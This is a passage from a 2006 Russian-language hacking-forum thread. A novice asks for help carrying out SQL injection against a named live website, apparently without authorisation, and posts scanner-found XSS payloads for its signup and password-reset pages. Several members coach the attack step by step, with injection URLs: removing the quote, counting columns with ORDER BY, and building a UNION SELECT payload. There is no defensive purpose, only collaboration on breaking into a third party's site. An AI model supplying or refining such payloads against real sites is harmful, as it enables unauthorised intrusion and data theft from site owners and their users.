ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Помогите с SQL injection, pls
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с SQL injection, pls
  #1  
Старый 14.10.2006, 13:24
Аватар для advsystem
advsystem
Новичок
Регистрация: 04.10.2006
Сообщений: 5
Провел на форуме:
28510

Репутация: 0
Question Помогите с SQL injection, pls
Вообщем нашел один сайтец, там можно провести SQL инъекцию, но у меня не совсем как-то удачно получается Может кто-нибудь поможет? Заранее thanks

http://atmsurf.com:80/news.php?ocd=view&id=1'+and+'1'='0
http://atmsurf.com:80/news.php?ocd=view&id='

пробовал много вариантов, но никак не получается.

Кстати сканер выдал еще это:

http://atmsurf.com:80/forgot_pass.php/>'><ScRiPt>alert(125764739)%3B</ScRiPt>
http://atmsurf.com:80/signup.php/>'><ScRiPt>alert(121850224)%3B</ScRiPt>
 
Ответить с цитированием

  #2  
Старый 14.10.2006, 13:48
Аватар для genom--
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию
мож там фильтруется все -- вот и не вышло ???
 
Ответить с цитированием

  #3  
Старый 14.10.2006, 13:52
Аватар для advsystem
advsystem
Новичок
Регистрация: 04.10.2006
Сообщений: 5
Провел на форуме:
28510

Репутация: 0
По умолчанию
Цитата:
Сообщение от genom--  
мож там фильтруется все -- вот и не вышло ???
Може быть, поэтому я решил спросить вас. Можно, что либо сделал там или безнадежно
 
Ответить с цитированием

  #4  
Старый 14.10.2006, 14:08
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
Цитата:
http://atmsurf.com:80/forgot_pass.php/>'><ScRiPt>alert(125764739)%3B</ScRiPt>
http://atmsurf.com:80/signup.php/>'><ScRiPt>alert(121850224)%3B</ScRiPt>
Acunetix Web Vul рулит ? =)
кол-во столбцов подобрал хоть? влом просто )
или не можешь имена подобрать ?
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #5  
Старый 14.10.2006, 14:14
Аватар для advsystem
advsystem
Новичок
Регистрация: 04.10.2006
Сообщений: 5
Провел на форуме:
28510

Репутация: 0
По умолчанию
Цитата:
Сообщение от blackybr  
Acunetix Web Vul рулит ? =)
кол-во столбцов подобрал хоть? влом просто )
или не можешь имена подобрать ?
Ага, хороший сканер=)
Там, кол-во столбцов пробовал подгонять, но постоянно пишут ошибку, хотя там их не много это я знаю.
А, ошибку постоянно выдает
 
Ответить с цитированием

  #6  
Старый 14.10.2006, 14:18
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
опиши способ "подгона" )
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #7  
Старый 14.10.2006, 14:25
Аватар для advsystem
advsystem
Новичок
Регистрация: 04.10.2006
Сообщений: 5
Провел на форуме:
28510

Репутация: 0
По умолчанию
Цитата:
Сообщение от blackybr  
опиши способ "подгона" )
Ну, допустим

http://atmsurf.com/news.php?ocd=view&id=1'+union+select+null,null/*
так выдает ошибку.
http://atmsurf.com/news.php?ocd=view&id=1+union+select+null,null/*
так нет.
Пробовал еще несколько вариантов.
 
Ответить с цитированием

  #8  
Старый 14.10.2006, 14:34
Аватар для pop_korn
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию
эм а ковычка тут нафиг не нужна
поэтому
http://atmsurf.com/news.php?ocd=view&id=1/*
потом щитаеш кол-во столбцов, с помощью order by
http://atmsurf.com/news.php?ocd=view&id=1 order by 10/*
если выдало ошибку, то столбцов меньше, чем 10
подбираеш пока не узнаеш кол-во столбцов, потом собственно юзаеш union

зы уже сто раз расписали, как это делать
 
Ответить с цитированием

  #9  
Старый 14.10.2006, 14:37
Аватар для advsystem
advsystem
Новичок
Регистрация: 04.10.2006
Сообщений: 5
Провел на форуме:
28510

Репутация: 0
По умолчанию
Цитата:
Сообщение от pop_korn  
потом щитаеш кол-во столбцов, с помощью order by
http://atmsurf.com/news.php?ocd=view&id=1 order by 10/*
если выдало ошибку, то столбцов меньше, чем 10
А если и 100 и 200 вписываешь?
И ошибку не выдает.
Полей, то всяко 100 не может быть
 
Ответить с цитированием

  #10  
Старый 14.10.2006, 14:38
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
_http://atmsurf.com:80/news.php?ocd=view&id=1'+union+select+null,null,nul l,null,null,null,null,null/*

и в чем проблема ? =) валяй даьше..
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ